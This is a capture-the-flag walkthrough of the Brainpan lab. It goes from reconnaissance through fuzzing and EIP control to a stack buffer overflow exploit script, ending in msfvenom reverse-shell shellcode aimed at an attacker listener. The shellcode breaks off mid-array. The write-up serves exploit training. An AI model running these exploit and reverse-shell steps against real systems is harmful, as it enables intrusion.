Walkthrough
Gaining a Foothold
Nmap
Initial scan
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.220.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:50 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 40.54 seconds
Script and version scan on ports 9999 and 10000
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p9999,10000 10.10.220.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 03:51 EST
Nmap scan report for 10.10.220.161
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=1/14%Time=65A3A090%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.11 seconds
Web Page
http://10.10.220.161:10000 serves a single static page; its HTML source references a /bin directory.
Directory busting
FFUF confirms /bin:
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://10.10.220.161:10000/FUZZ -recursion
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.220.161:10000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# directory-list-2.3-medium.txt [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 276ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
[Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# on atleast 2 different hosts [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 275ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1038ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1039ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1040ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1061ms]
# Copyright 2007 James Fisher [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1062ms]
# [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1064ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 215, Words: 7, Lines: 9, Duration: 1065ms]
bin [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 272ms]
[INFO] Adding a new job to the queue: http://10.10.220.161:10000/bin/FUZZ
The lines beginning with # are not real hits: they are the wordlist's own comment lines, and because # starts a URL fragment each of them is requested as / and returns the 215-byte index page. Filter them out with -fs 215 (or let ffuf auto-calibrate with -ac) so that only /bin remains.
Buffer Overflow
Do not fuzz the live target: a crash takes down the only copy of the service. Download brainpan.exe from /bin and do the crash work on a local Windows VM under a debugger, then port the finished exploit to the target.
Connecting by hand first shows the password prompt seen in the nmap banner:
nc 10.10.20.71 9999
On a Windows VM
Download and run Immunity Debugger as administrator
Download and run brainpan.exe as administrator
Attach brainpan.exe to Immunity Debugger (File > Attach)
Hit play (F9) to let the process run; Immunity pauses it at the first access violation
Download mona.py from https://github.com/corelan/mona and copy it into Immunity's PyCommands folder
Mona Configuration
Whether mona came preinstalled or you just copied it in, set a working folder so its output files land somewhere predictable. Run this in the command input box at the bottom of the Immunity Debugger window:
!mona config -set workingfolder c:\mona\%p
Fuzzing
fuzzer.py
import sys, socket
from time import sleep

buffer = "A" * 100

while True:
    try:
        payload = buffer + '\r\n'
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('192.168.137.143', 9999))   # local Windows VM running brainpan.exe
        print("[+] Sending the payload...\n" + str(len(buffer)))
        s.send(payload.encode())
        s.close()
        sleep(1)
        buffer = buffer + "A" * 100            # 100 bytes longer each round
    except:
        # bare except: fires when the connection fails, but also on Ctrl-C
        print("The fuzzing crashed at %s bytes" % str(len(buffer)))
        sys.exit()
Run the fuzzer with python3 fuzzer.py.
The fuzzer sends increasingly long strings of As. If one of them crashes the server, the next connection should fail and the script exits with a message; the length it prints is the one it could not deliver, so the last string actually sent was 100 bytes shorter. Keep an eye on Immunity as well: while the process sits suspended in the debugger the OS may still accept connections, so the access violation usually shows up in Immunity before the script notices anything.
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 fuzzer.py
[+] Sending the payload...
100
[+] Sending the payload...
200
[+] Sending the payload...
300
[+] Sending the payload...
400
[+] Sending the payload...
500
[+] Sending the payload...
600
[+] Sending the payload...
700
[+] Sending the payload...
800
[+] Sending the payload...
900
^CThe fuzzing crashed at 1000 bytes
The ^C shows the run was stopped by hand (the bare except catches Ctrl-C too), so the "1000 bytes" marks where the script was interrupted, not a crash it detected. The length to note is the one in flight when Immunity reported the access violation.
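An added example, not code from the walkthrough or from the course it follows: a fuzzer that decides a crash has happened when the service stops answering, instead of waiting for a connection error. brainpan replies to every password attempt (ACCESS DENIED), so a send that gets no reply means the process is gone, and there is no bare except to swallow Ctrl-C. So that it runs offline it carries a constructed stand-in server, ToyBrainpan, that answers like brainpan until a line of CRASH_AT bytes or more arrives and then goes silent; the 600-byte threshold, the 127.0.0.1 address and the OS-chosen port are assumptions of the example, not facts about the target.

```python
import socket
import threading

# Constructed stand-in for brainpan.exe so the fuzzer can run offline (not the
# real service). It replies "ACCESS DENIED" to every line, like brainpan does
# for a wrong password, until a line of CRASH_AT bytes or more arrives; then it
# drops the connection without answering and stops listening, which is how a
# crashed (or debugger-suspended) process looks from the network.
CRASH_AT = 600   # assumed crash threshold of the toy server


class ToyBrainpan(threading.Thread):
    def __init__(self, host="127.0.0.1"):
        super().__init__(daemon=True)
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.bind((host, 0))          # port 0: the OS picks a free port
        self.listener.listen(5)
        self.host, self.port = self.listener.getsockname()

    def run(self):
        while True:
            conn, _ = self.listener.accept()
            conn.sendall(b">> ")
            line = b""
            while not line.endswith(b"\n"):    # read one CRLF-terminated password
                chunk = conn.recv(4096)
                if not chunk:
                    break
                line += chunk
            if len(line.rstrip(b"\r\n")) >= CRASH_AT:
                self.listener.close()          # the "crash": nobody answers any more
                conn.close()
                return
            conn.sendall(b"ACCESS DENIED\n")
            conn.close()


def probe(host, port, length, timeout=3.0):
    """Send one run of `length` A's and report whether the service still answered."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                             # banner / prompt
            s.sendall(b"A" * length + b"\r\n")
            return s.recv(1024) != b""               # EOF (b"") means no answer
    except OSError:                                  # refused, reset or timed out
        return False


def fuzz(host, port, step=100, limit=5000):
    """Grow the input by `step` bytes per connection and return the first length
    the service fails to answer (the crashing length), or None up to `limit`."""
    for length in range(step, limit + 1, step):
        print(f"[+] Sending {length} bytes...")
        if not probe(host, port, length):
            print(f"[!] No reply at {length} bytes: the service is down")
            return length
    return None


def run_offline_demo(step=100):
    """Start the toy server on a free local port and fuzz it; returns the
    length at which it stopped answering (600 with the default step)."""
    server = ToyBrainpan()
    server.start()
    return fuzz(server.host, server.port, step=step)


if __name__ == "__main__":
    print("crashing length:", run_offline_demo())
```

Point fuzz() at the Windows VM (its IP and port 9999) instead of the toy server to use it for real. The reported length is the first one that went unanswered, so the crash lies at or below it, and the step size sets how precisely you know where.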
Crash Replication & Controlling EIP
Generate a cyclic pattern somewhat longer than the input that crashed the server (the room's notes suggest 400 bytes more, e.g. pattern_create.rb -l 600) and put it into the payload variable of exploit.py:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Here the pattern is sized to the last length the fuzzer sent, 1000 bytes, which comfortably covers the crash:
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msf-pattern_create -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
exploit.py
import sys, socket
buffer ="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py
Sending payload...
brainpan.exe crashes in Immunity
EIP reads 35724134 (four bytes of the pattern, stored little-endian)
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msf-pattern_offset -l 1000 -q 35724134
[*] Exact match at offset 524
So 524 bytes of padding bring us exactly to the saved return address: bytes 525 to 528 of the input land in EIP.
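To show what msf-pattern_create and msf-pattern_offset actually do with the value in EIP, here is an added example (not code from the page or from Metasploit) that reimplements both and confirms the 524 above from the EIP value 35724134 in a 1000-byte pattern. Nothing in it is specific to the target; the only inputs are the pattern length and the register value from the debugger.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Same sequence as msf-pattern_create: Aa0Aa1...Aa9Ab0...Az9Ba0..., cut to
    `length` characters. Every 4-byte window in it is unique, which is what
    lets a register value be mapped back to an offset."""
    out = []
    for up in UPPER:
        for lo in LOWER:
            for d in DIGIT:
                out.append(up + lo + d)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(length, eip):
    """Same answer as msf-pattern_offset -l length -q eip. `eip` is the value
    shown in the debugger (hex string or int). The register holds it
    little-endian, so pack it back into the four bytes that sat on the stack
    and find them in the pattern; None if the value did not come from it."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    stack_bytes = struct.pack("<I", eip).decode("ascii", errors="replace")
    off = pattern_create(length).find(stack_bytes)
    return None if off < 0 else off


def eip_from_payload(payload, offset):
    """What EIP will hold after the overflow: the four bytes at `offset`, read
    little-endian like the CPU does. Use it to check a crafted buffer before
    sending it."""
    return struct.unpack_from("<I", payload, offset)[0]


if __name__ == "__main__":
    print(pattern_create(1000))
    print("offset:", pattern_offset(1000, "35724134"))        # 524
    print(hex(eip_from_payload(b"A" * 524 + b"BBBB", 524)))   # 0x42424242
```

pattern_offset works because 0x35724134 unpacked little-endian is the ASCII run "4Ar5", which occurs once in the pattern, at index 524; eip_from_payload is the reverse check, and applied to the pattern itself at 524 it returns 0x35724134 again.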
Edit exploit.py
import sys, socket
buffer = "A" * 524 + "B" * 4
# 524 A's fill the buffer up to the saved return address;
# the four B's overwrite it, so EIP should now read 42424242,
# which proves we control the instruction pointer
print("Sending payload...")
payload = buffer + '\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send((payload.encode()))
s.close()
Restart brainpan in Immunity and run exploit.py again; EIP now reads 42424242.
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ python3 exploit.py
Sending payload...
Finding Bad Characters
Copy badchars to exploit.py
import sys, socket
# Everything is bytes here: str.encode() is UTF-8 and would turn every value
# from \x80 upward into two bytes, so the dump could never match what we sent
buffer = b"A" * 524 + b"B" * 4
# \x00 is left out from the start: the input is handled as a C string and a
# null byte would cut off everything after it
badchars = (
    b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
print("Sending payload...")
payload = buffer + badchars + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
Restart brainpan in Immunity and run the script
Crash > good
Right-click ESP > Follow in Dump
After the crash, right-click the hex value of the ESP register in Immunity and select "Follow in Dump". The bytes we sent, 01 through FF, appear in the hex dump pane. Read the whole run and look for any value that is missing, out of sequence or replaced: each one is a bad character, and the input is often corrupted from that point on, so remove it, resend and check again. In this case no further bad characters turn up; only \x00 is bad.
Don't rely on mona alone for finding bad chars; confirm them by reading the dump yourself.
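An added example, not code from the page or from mona, for the bad-character comparison described above: it generates the test buffer as bytes, shows what goes wrong when the same values are kept in a str and sent through .encode(), and compares the buffer with a dump to list the bytes that were altered or swallowed. The dump OBSERVED is constructed for the example (a target that drops 0x0a and replaces 0x0d with a space); on brainpan only \x00 is bad, as the walkthrough found. To use it for real, copy exactly len(SENT) bytes from the dump starting at ESP into observed.

```python
from difflib import SequenceMatcher


def badchar_buffer(exclude=(0x00,)):
    """Every byte value 0x00-0xff minus the ones already known to be bad.
    \\x00 is excluded from the start: the input is handled as a C string, so a
    null would cut off everything after it. Returns bytes, never str: str.encode()
    is UTF-8 and would turn each value from 0x80 upward into two bytes."""
    return bytes(b for b in range(256) if b not in exclude)


def wire_bytes_if_sent_as_str(buf):
    """What leaves the socket if these values are kept in a str and sent with
    .encode(): the pitfall behind the earlier str-based scripts. For the
    255-byte buffer this yields 383 bytes, not 255."""
    return buf.decode("latin-1").encode("utf-8")


def find_badchars(sent, observed):
    """Compare the bytes we sent with the bytes that landed at ESP (copied out of
    the debugger's dump, at most len(sent) of them) and return the sent values
    that were altered or dropped, in order. SequenceMatcher aligns the two runs
    the way you would by eye, so several bad characters in a row are handled.
    If the dump simply stops short, only the first missing byte is reported:
    a byte that truncates the copy hides everything after it, so remove it
    and test again before judging the rest."""
    bad = []
    ops = SequenceMatcher(None, sent, observed, autojunk=False).get_opcodes()
    for tag, i1, i2, j1, j2 in ops:
        if tag == "delete" and i2 == len(sent) and j1 == len(observed):
            bad.append(sent[i1])              # the copy was truncated here
        elif tag in ("replace", "delete"):
            bad.extend(sent[i1:i2])           # altered or swallowed bytes
    return bad


# Constructed dump (not a real capture): what a target that drops 0x0a and
# turns 0x0d into a space would leave at ESP for the buffer above.
SENT = badchar_buffer()
OBSERVED = SENT.replace(b"\x0a", b"").replace(b"\x0d", b"\x20")

if __name__ == "__main__":
    print([hex(b) for b in find_badchars(SENT, OBSERVED)])   # ['0xa', '0xd']
    print(len(SENT), len(wire_bytes_if_sent_as_str(SENT)))   # 255 383
```

Once a bad character is confirmed, add it to exclude, regenerate the buffer and repeat until the dump matches; the final exclude list is what goes into msfvenom's -b option.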
Restart brainpan in Immunity
With mona loaded, list the modules:
!mona modules
We want a module whose protection columns (Rebase, SafeSEH, ASLR, NXCompat) are all False, so its addresses are fixed and usable; brainpan.exe itself qualifies.
Find a JMP ESP (opcode FF E4) inside it:
!mona find -s "\xff\xe4" -m brainpan.exe
Found 311712f3
Click the black arrow (Go to address) in the toolbar and enter 311712f3
That is our JMP ESP: once the return address is overwritten with it, execution jumps to the top of the stack, where the rest of our input sits
Press F2 to set a breakpoint on it
Once we hit the JMP ESP instruction, we can put shellcode after it
The return address is written in little-endian byte order: 311712F3 becomes \xf3\x12\x17\x31
Edit exploit.py
import sys, socket
buffer = b"A" * 524 + b"\xf3\x12\x17\x31"
print("Sending payload...")
payload = buffer + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.137.143',9999))
s.send(payload)
s.close()
*Heath (the course instructor) ran into payload encoding problems, which is why the buffer is now built from bytes literals instead of a str: str.encode() is UTF-8, so a return address byte such as \xf3 would leave the socket as two bytes and EIP would be wrong.
Restart brainpan in Immunity and run exploit.py
Execution stops at the breakpoint on JMP ESP: the return address overwrite works
Close Immunity
Run brainpan.exe as administrator on its own, outside the debugger
On Kali, generate a reverse shell payload, excluding the bad character \x00
┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.137.133 LPORT=7777 -f c -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes
unsigned char buf[] =
"\xda\xdf\xd9\x74\x24\xf4\xbe\xf0\x0b\xa5\x15\x58\x2b\xc9"
"\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x30\x0f\x47\xe0\x4c"
"\xf8\x05\x0b\xac\xf9\x69\x85\x49\xc8\xa9\xf1\x1a\x7b\x1a"
"\x71\x4e\x70\xd1\xd7\x7a\x03\x97\xff\x8d\xa4\x12\x26\xa0"
"\x35\x0e\x1a\xa3\xb5\x4d\x4f\x03\x87\x9d\x82\x42\xc0\xc0"
"\x6f\x16\x99\x8f\xc2\x86\xae\xda\xde\x2d\xfc\xcb\x66\xd2"
"\xb5\xea\x47\x45\xcd\xb4\x47\x64\x02\xcd\xc1\x7e\x47\xe8"
"\x98\xf5\xb3\x86\x1a\xdf\x8d\x67\xb0\x1e\x22\x9a\xc8\x67"
"\x85\x45\xbf\x91\xf5\xf8\xb8\x66\x87\x26\x4c\x7c\x2f\xac"
"\xf6\x58\xd1\x61\x60\x2b\xdd\xce\xe6\x73\xc2\xd1\x2b\x08"
"\xfe\x5a\xca\xde\x76\x18\xe9\xfa\xd3\xfa\x90\x5b\xbe\xad"
"\xad\xbb\x61\x11\x08\xb0\x8c\x46\x21\x9b\xd8\xab\x08\x23"
"\x19\xa4\x1b\x50\x2b\x6b\xb0\xfe\x07\xe4\x1e\xf9\x68\xdf"
"\xe7\x95\x96\xe0\x17\xbc\x5c\xb4\x47\xd6\x75\xb5\x03\x26"
"\x79\x60\x83\x76\xd5\xdb\x64\x26\x95\x8b\x0c\x2c\x1a\xf3"
"\x2d\x4f\xf0\x9c\xc4\xaa\x93\x62\xb0\x3d\xe6\x0b\xc3\x3d"
"\xf7\xaa\x4a\xdb\x6d\x3d\x1b\x74\x1a\xa4\x06\x0e\xbb\x29"
"\x9d\x6b\xfb\xa2\x12\x8c\xb2\x42\x5e\x9e\x23\xa3\x15\xfc"
"\xe2\xbc\x83\x68\x68\x2e\x48\x68\xe7\x53\xc7\x3f\xa0\xa2"
"\x1e\xd5\x5c\x9c\x88\xcb\x9c\x78\xf2\x4f\x7b\xb9\xfd\x4e"
"\x0e\x85\xd9\x40\xd6\x06\x66\x34\x86\x50\x30\xe2\x60\x0b"
"\xf2\x5c\x3b\xe0\x5c\x08\xba\xca\x5e\x4e\xc3\x06\x29\xae"
"\x72\xff\x6c\xd1\xbb\x97\x78\xaa\xa1\x07\x86\x61\x62\x37"
"\xcd\x2b\xc3\xd0\x88\xbe\x51\xbd\x2a\x15\x95\xb8\xa8\x9f"
